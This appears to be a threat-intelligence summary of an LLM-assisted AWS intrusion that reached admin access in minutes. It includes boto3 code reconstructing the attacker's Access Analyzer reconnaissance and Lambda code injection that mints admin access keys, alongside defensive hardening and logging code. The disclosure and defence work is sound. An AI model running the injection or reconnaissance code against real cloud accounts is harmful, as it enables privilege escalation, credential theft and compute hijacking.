AI-Assisted Cloud Intrusion Achieves Admin Access in 8 Minutes
Summary:
On November 28, 2025, a threat actor executed a highly automated cloud intrusion against an AWS environment, escalating from initial access to administrative privileges in less than 10 minutes. The attack utilized credentials stolen from public S3 buckets to infiltrate the victim’s infrastructure. The operation was notable for its heavy reliance on Large Language Models (LLMs), which the adversary used to automate reconnaissance, generate malicious Python code, and facilitate real-time decision-making.
The total time from credential theft to the successful execution of a malicious Lambda function was just eight minutes. Notably, the attacker explicitly queried IAM Access Analyzer findings: by reviewing the "external access" and "unused access" findings generated by the victim's own security tooling, the attacker identified vulnerable attack paths and unused roles to target, effectively weaponizing the organization's security posture against itself. To access specific high-end AI models, the attacker programmatically interacted with AWS Marketplace APIs (SearchAgreements, AcceptAgreementRequest) to accept end-user license agreements (EULAs) on the fly, ensuring their model invocation requests would not fail for lack of an accepted agreement. The attacker's ultimate goals appeared to involve resource hijacking for model training or compute resale, evidenced by "LLMjacking" (abuse of Amazon Bedrock models) and the launching of high-cost GPU instances.
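A minimal sketch of that reconnaissance step is below, assuming the stolen IAM user credentials are loaded into the default boto3 session. This illustrates the technique, not the attacker's recovered tooling; the analyzer names and paging limits are arbitrary.

```python
import boto3

# Read the victim's own IAM Access Analyzer findings to shortlist externally
# reachable resources and dormant roles worth targeting.
aa = boto3.client("accessanalyzer")

for analyzer in aa.list_analyzers()["analyzers"]:
    resp = aa.list_findings_v2(analyzerArn=analyzer["arn"], maxResults=100)
    for finding in resp["findings"]:
        # ExternalAccess findings expose resources reachable from outside the
        # account; UnusedIAMRole findings flag roles nobody is watching.
        print(analyzer["name"], finding.get("findingType"),
              finding.get("resource"), finding["status"])
```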
Security Officer Comments:
The adversary's profile suggests a likely Serbian origin, based on comments found in the injected code, and a heavy dependence on AI tooling, indicated by hallucinations such as references to non-existent account IDs and a fake GitHub repository. The initial access vector was public S3 buckets containing valid IAM user credentials intended for testing.
TTPs included extensive reconnaissance across AWS services (including Bedrock, Lambda, and Secrets Manager) and privilege escalation via Lambda function code injection. Specifically, the attacker modified an existing function (EC2-init) to create new access keys for an admin user named "frick". Lateral movement was aggressive, spanning 19 unique AWS principals and involving attempts to assume the OrganizationAccountAccessRole across both valid and hallucinated account numbers. The attack also featured significant data collection, including secrets, SSM parameters, and CloudTrail logs. Demonstrating the trend toward AI-assisted threats, the attacker installed a backdoor via a JupyterLab server on a p4d.24xlarge GPU instance and invoked models such as Claude 3.5 Sonnet and Titan Text G1 through the victim's Bedrock access.
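To make the escalation primitive concrete, the following is a hypothetical reconstruction of the pattern described above, not the actor's recovered payload; the handler name and the exfiltration step are assumptions. The key point is that injected code runs under the function's execution role, so an over-permissive role on EC2-init is what turns a code update into admin access.

```python
import io
import textwrap
import zipfile

import boto3

# Hypothetical reconstruction of the injected payload. It runs under the
# function's execution role, not the invoker's identity.
injected_source = textwrap.dedent("""\
    import boto3

    def lambda_handler(event, context):  # assumes the default handler name
        iam = boto3.client("iam")
        # An over-broad execution role makes this call succeed.
        new_key = iam.create_access_key(UserName="frick")
        # A real payload would exfiltrate new_key["AccessKey"] here.
        return {"status": "done"}
""")

# Package the payload and overwrite the existing function's code; the next
# invocation mints fresh admin access keys.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("lambda_function.py", injected_source)

boto3.client("lambda").update_function_code(
    FunctionName="EC2-init",
    ZipFile=buf.getvalue(),
)
```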
Suggested Corrections:
Sysdig Recommendations
- Apply the principle of least privilege to all IAM users and roles, including execution roles used by Lambda functions. An overly permissive execution role enabled the threat actor to escalate privileges in this attack.
- Restrict UpdateFunctionConfiguration and PassRole permissions carefully. Threat actors may attempt to replace a Lambda function's execution role with a more privileged one, which requires both permissions.
- Limit UpdateFunctionCode permissions to specific functions and assign them only to principals that genuinely need code deployment capabilities.
- Enable Lambda function versioning to maintain immutable records of the code running at any point. Use function aliases to point to specific versions, requiring a threat actor to both modify code and update the alias to affect production (see the first sketch after this list).
- Ensure S3 buckets containing sensitive data, including RAG data and AI model artifacts, are not publicly accessible.
- Enable model invocation logging for Amazon Bedrock to detect unauthorized usage.
- Monitor for IAM Access Analyzer enumeration, as this provides threat actors with valuable reconnaissance data about your environment (see the second sketch after this list).
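The two Lambda-hardening items above can be combined in practice. The sketch below, with hypothetical policy, region, account, and alias names, scopes lambda:UpdateFunctionCode to a single function and pins production traffic to an immutable published version behind an alias:

```python
import json

import boto3

lambda_client = boto3.client("lambda")
iam = boto3.client("iam")

# Hypothetical names for illustration.
FUNCTION = "EC2-init"
ACCOUNT = "111122223333"

# Scope code-deployment permission to one function for the deployment
# principal, instead of granting lambda:UpdateFunctionCode on "*".
deploy_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["lambda:UpdateFunctionCode"],
        "Resource": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:{FUNCTION}",
    }],
}
iam.create_policy(
    PolicyName="deploy-ec2-init-only",
    PolicyDocument=json.dumps(deploy_policy),
)

# Pin production traffic to an immutable published version via an alias, so
# tampering requires both a code update and an alias update.
version = lambda_client.publish_version(FunctionName=FUNCTION)["Version"]
lambda_client.create_alias(
    FunctionName=FUNCTION, Name="prod", FunctionVersion=version
)
```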
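For the logging and monitoring items, a minimal sketch follows, with placeholder log-group, role, and account names: it enables Bedrock model invocation logging so LLMjacking leaves a trail, then sweeps CloudTrail for the Access Analyzer enumeration calls observed in this intrusion.

```python
from datetime import datetime, timedelta, timezone

import boto3

# Enable Bedrock model invocation logging to CloudWatch Logs. The log group
# and role ARN are placeholders.
boto3.client("bedrock").put_model_invocation_logging_configuration(
    loggingConfig={
        "cloudWatchConfig": {
            "logGroupName": "/aws/bedrock/model-invocations",
            "roleArn": "arn:aws:iam::111122223333:role/BedrockLoggingRole",
        },
        "textDataDeliveryEnabled": True,
    }
)

# Sweep the last 24 hours of CloudTrail for Access Analyzer enumeration.
# Note lookup_events accepts only one lookup attribute per call.
cloudtrail = boto3.client("cloudtrail")
start = datetime.now(timezone.utc) - timedelta(days=1)
for event_name in ("ListAnalyzers", "ListFindings", "ListFindingsV2"):
    events = cloudtrail.lookup_events(
        LookupAttributes=[
            {"AttributeKey": "EventName", "AttributeValue": event_name}
        ],
        StartTime=start,
    )["Events"]
    for event in events:
        print(event["EventTime"], event.get("Username"), event_name)
```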
https://www.sysdig.com/blog/ai-assisted-cloud-intrusion-achieves-admin-access-in-8-minutes